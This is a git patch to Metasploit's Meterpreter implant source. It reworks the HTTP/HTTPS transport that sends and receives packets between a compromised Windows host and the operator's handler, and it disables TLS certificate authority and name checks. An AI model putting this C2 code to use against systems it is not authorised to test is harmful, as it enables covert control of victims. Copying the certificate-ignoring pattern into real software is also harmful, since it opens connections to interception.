From 3bb2a2d07fa7bb925239573c554bb27a21d2d5b0 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Tue, 28 Jun 2011 07:30:48 +0000
Subject: [PATCH] Rework this for compatibility with older OSs

git-svn-id: file:///home/svn/framework3/trunk@13045 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../source/meterpreter/source/common/common.h |  2 +-
 .../source/meterpreter/source/common/core.c   | 32 ++++++++++++++-----
 .../meterpreter/source/server/server_setup.c  | 27 ++++++++--------
 3 files changed, 39 insertions(+), 22 deletions(-)

diff --git a/external/source/meterpreter/source/common/common.h b/external/source/meterpreter/source/common/common.h
index 507a7bf11e..2c6bd9098f 100644
--- a/external/source/meterpreter/source/common/common.h
+++ b/external/source/meterpreter/source/common/common.h
@@ -75,7 +75,7 @@ void real_dprintf(char *filename, int line, const char *function, char *format,
 #define METERPRETER_TRANSPORT_HTTPS 2
 
 // Enable debugging
-// #define DEBUGTRACE 1
+//#define DEBUGTRACE 1
 
 #ifdef DEBUGTRACE
 #define dprintf(...) real_dprintf(__VA_ARGS__)
diff --git a/external/source/meterpreter/source/common/core.c b/external/source/meterpreter/source/common/core.c
index 2bade9711c..28af2e0a3b 100644
--- a/external/source/meterpreter/source/common/core.c
+++ b/external/source/meterpreter/source/common/core.c
@@ -1109,8 +1109,11 @@ DWORD packet_transmit_via_http_wininet(Remote *remote, Packet *packet, PacketReq
 	HINTERNET hRes;
 	DWORD retries = 5;
 	DWORD flags;
+	DWORD flen;
 	unsigned char *buffer;
 
+	flen = sizeof(flags);
+
 	buffer = malloc( packet->payloadLength + sizeof(TlvHeader) );
 	if (! buffer) {
 		SetLastError(ERROR_NOT_FOUND);
@@ -1122,19 +1125,28 @@ DWORD packet_transmit_via_http_wininet(Remote *remote, Packet *packet, PacketReq
 
 	do {
 
-		flags = INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_NO_UI;
+		flags = INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_NO_UI;
 		if (remote->transport == METERPRETER_TRANSPORT_HTTPS) {
 			flags |= INTERNET_FLAG_SECURE |  INTERNET_FLAG_IGNORE_CERT_CN_INVALID  | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID;
 		}
 
 		hReq = HttpOpenRequest(remote->hConnection, "POST", remote->uri, NULL, NULL, NULL, flags, 0);
+
 		if (hReq == NULL) {
			dprintf("[PACKET RECEIVE] Failed HttpOpenRequest: %d", GetLastError());
			SetLastError(ERROR_NOT_FOUND);
			break;
		}

+
+		if (remote->transport == METERPRETER_TRANSPORT_HTTPS) {
+			InternetQueryOption( hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, &flen);
+			flags |= SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_UNKNOWN_CA;
+			InternetSetOption(hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, flen);
+		}
+
 retry_request:
 		hRes = HttpSendRequest(hReq, NULL, 0, buffer, packet->payloadLength + sizeof(TlvHeader) );
+
 		if (hRes == NULL && GetLastError() == ERROR_INTERNET_INVALID_CA && retries > 0) {
 			retries--;
-			flags = 0x3380;
-			InternetSetOption(hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, 4);
+//			flags = 0x3380;
+//			InternetSetOption(hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, 4);
 			goto retry_request;
 		}
 
@@ -1340,18 +1352,22 @@ DWORD packet_receive_http_via_wininet(Remote *remote, Packet **packet) {
 	HINTERNET hRes;
 	DWORD retries = 5;
 	
+	dprintf("[PACKET RECEIVE] Acquiring lock");
+
 	lock_acquire( remote->lock );
 
 	do {
 
-		flags = INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_NO_UI;
+		flags = INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_NO_UI;
 		if (remote->transport == METERPRETER_TRANSPORT_HTTPS) {
 			flags |= INTERNET_FLAG_SECURE | INTERNET_FLAG_IGNORE_CERT_CN_INVALID | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID;
 		}
-
-		hReq = HttpOpenRequest(remote->hConnection, "GET", remote->uri, NULL, NULL, NULL, flags, 0);
+		dprintf("[PACKET RECEIVE] HttpOpenRequest");
+		hReq = HttpOpenRequest(remote->hConnection, "POST", remote->uri, NULL, NULL, NULL, flags, 0);
 		if (hReq == NULL) {
			dprintf("[PACKET RECEIVE] Failed HttpOpenRequest: %d", GetLastError());
			SetLastError(ERROR_NOT_FOUND);
			break;
		}
+
 retry_request:
+		dprintf("[PACKET RECEIVE] HttpSendRequest");
 		hRes = HttpSendRequest(hReq, NULL, 0, "RECV", 4);
 		dprintf("[RECEIVE] Got HTTP Reply: 0x%.8x", hRes);	
 		if (hRes == NULL && GetLastError() == ERROR_INTERNET_INVALID_CA && retries > 0) {
@@ -1372,7 +1388,7 @@ retry_request:
 		while (inHeader && retries > 0)
 		{
 			retries--;
-
+			dprintf("[PACKET RECEIVE] Header");
 			if (! InternetReadFile(hReq, ((PUCHAR)&header + headerBytes), sizeof(TlvHeader) - headerBytes, &bytesRead))  {
 				dprintf("[PACKET RECEIVE] Failed HEADER InternetReadFile: %d", GetLastError());
 				SetLastError(ERROR_NOT_FOUND);
@@ -1415,7 +1431,7 @@ retry_request:
 		while (payloadBytesLeft > 0 && retries > 0 )
 		{
 			retries--;
-
+			dprintf("[PACKET RECEIVE] Data");
 			if (! InternetReadFile(hReq, payload + payloadLength - payloadBytesLeft, payloadBytesLeft, &bytesRead))  {
 				dprintf("[PACKET RECEIVE] Failed BODY InternetReadFile: %d", GetLastError());
 				SetLastError(ERROR_NOT_FOUND);
diff --git a/external/source/meterpreter/source/server/server_setup.c b/external/source/meterpreter/source/server/server_setup.c
index 3e16c95389..0df14b55aa 100644
--- a/external/source/meterpreter/source/server/server_setup.c
+++ b/external/source/meterpreter/source/server/server_setup.c
@@ -388,8 +388,9 @@ static DWORD server_dispatch_http_wininet( Remote * remote )
 	URL_COMPONENTS bits;
 	DWORD ecount = 0;
 	DWORD delay = 0;
+	char tmpHostName[512];
+	char tmpUrlPath[1024];
 
-	
 	if (global_expiration_timeout > 0) 
 		remote->expiration_time  = current_unix_timestamp() + global_expiration_timeout;
 	else
@@ -407,27 +408,27 @@ static DWORD server_dispatch_http_wininet( Remote * remote )
 	}
 	dprintf("[DISPATCH] Configured hInternet: 0x%.8x", remote->hInternet);
 
+	
 	// The InternetCrackUrl method was poorly designed...
+	memset(tmpHostName, 0, sizeof(tmpHostName));
+	memset(tmpUrlPath, 0, sizeof(tmpUrlPath));
+
 	memset(&bits, 0, sizeof(bits));
 	bits.dwStructSize = sizeof(bits);
-	bits.dwSchemeLength    = 1;
-	bits.dwHostNameLength  = 1;
-	bits.dwUserNameLength  = 1;
-	bits.dwPasswordLength  = 1;
-	bits.dwUrlPathLength   = 1;
-	bits.dwExtraInfoLength = 1;
+	bits.dwHostNameLength  = sizeof(tmpHostName) -1;
+	bits.lpszHostName      = tmpHostName;
+	bits.dwUrlPathLength   = sizeof(tmpUrlPath) -1;
+	bits.lpszUrlPath       = tmpUrlPath;
+
 	InternetCrackUrl(remote->url, 0, 0, &bits);
 
-	remote->uri = _strdup(bits.lpszUrlPath);
-
-	bits.lpszHostName[bits.dwHostNameLength] = 0;
-
+	remote->uri = _strdup(tmpUrlPath);
 
 	dprintf("[DISPATCH] Configured URL: %s", remote->uri);
-	dprintf("[DISPATCH] Host: %s Port: %u", bits.lpszHostName, bits.nPort);
+	dprintf("[DISPATCH] Host: %s Port: %u", tmpHostName, bits.nPort);
 
 	// Allocate the connection handle
-	remote->hConnection = InternetConnect(remote->hInternet, bits.lpszHostName, bits.nPort, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
+	remote->hConnection = InternetConnect(remote->hInternet, tmpHostName, bits.nPort, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
 	if (!remote->hConnection) {
 		dprintf("[DISPATCH] Failed InternetConnect: %d", GetLastError());
 		return 0;